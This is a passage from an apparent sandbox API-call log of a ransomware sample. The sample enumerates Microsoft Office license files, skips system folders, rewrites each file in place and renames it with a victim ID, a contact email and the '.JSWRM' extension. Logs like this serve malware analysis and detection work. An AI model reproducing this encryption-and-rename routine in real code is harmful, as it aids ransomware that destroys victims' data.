cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0109.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0109.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0109.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.705] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0109.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0109.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0109.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.706] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac7e2dd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeac7e2dd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeadd5802, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherVL_MAK-pl.xrm-ms", cAlternateFileName="PU98DA~1.XRM")) returned 1 [0109.706] lstrcmpiW (lpString1="PublisherVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0109.706] lstrcmpiW (lpString1="PublisherVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0109.706] lstrcmpiW (lpString1="PublisherVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0109.706] lstrcmpiW (lpString1="PublisherVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0109.707] lstrcmpiW (lpString1="PublisherVL_MAK-pl.xrm-ms", lpString2="recovery") returned -1 [0109.707] lstrcmpiW (lpString1="PublisherVL_MAK-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.707] lstrcmpiW (lpString1="PublisherVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.707] lstrcmpiW (lpString1="PublisherVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.707] lstrcmpiW (lpString1="PublisherVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.707] lstrcmpiW (lpString1="PublisherVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0109.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0109.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0109.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2411c8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0109.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0109.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0109.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0109.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0109.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0109.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0109.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.707] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0109.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.708] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10635) returned 1 [0109.708] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0109.708] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0109.751] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.751] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0109.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.752] CloseHandle (hObject=0x45c) returned 1 [0109.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0109.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0109.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0109.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0109.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0109.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0109.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.752] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0109.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0109.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0109.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0109.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0109.754] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeae6e174, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeae6e174, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeaf2cd2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherVL_MAK-ppd.xrm-ms", cAlternateFileName="PUD9C9~1.XRM")) returned 1 [0109.754] lstrcmpiW (lpString1="PublisherVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0109.754] lstrcmpiW (lpString1="PublisherVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0109.754] lstrcmpiW (lpString1="PublisherVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0109.754] lstrcmpiW (lpString1="PublisherVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0109.754] lstrcmpiW (lpString1="PublisherVL_MAK-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.754] lstrcmpiW (lpString1="PublisherVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.754] lstrcmpiW (lpString1="PublisherVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.754] lstrcmpiW (lpString1="PublisherVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.754] lstrcmpiW (lpString1="PublisherVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.754] lstrcmpiW (lpString1="PublisherVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0109.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0109.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0109.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f48, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0109.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0109.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0109.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0109.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241100, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0109.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0109.755] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0109.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0109.755] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.755] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6732) returned 1 [0109.755] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a40) returned 0x205850 [0109.755] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a40, lpOverlapped=0x0) returned 1 [0109.757] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.757] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a40, lpOverlapped=0x0) returned 1 [0109.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0109.758] CloseHandle (hObject=0x45c) returned 1 [0109.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0109.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0109.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0109.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0109.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0109.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0109.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0109.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0109.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0109.759] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1db7b8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb1db7b8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb29a366, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PublisherVL_MAK-ul-oob.xrm-ms", cAlternateFileName="PU66C1~1.XRM")) returned 1 [0109.763] lstrcmpiW (lpString1="PublisherVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.763] lstrcmpiW (lpString1="PublisherVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.763] lstrcmpiW (lpString1="PublisherVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.763] lstrcmpiW (lpString1="PublisherVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.763] lstrcmpiW (lpString1="PublisherVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.763] lstrcmpiW (lpString1="PublisherVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.763] lstrcmpiW (lpString1="PublisherVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.763] lstrcmpiW (lpString1="PublisherVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.763] lstrcmpiW (lpString1="PublisherVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.763] lstrcmpiW (lpString1="PublisherVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0109.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0109.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PublisherVL_MAK-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240fc0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0109.764] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0109.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.764] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0109.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PublisherVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\publishervl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.765] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0109.765] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0109.765] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0109.767] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.767] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0109.767] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.767] CloseHandle (hObject=0x45c) returned 1 [0109.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0109.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.767] RtlAllocateHeap 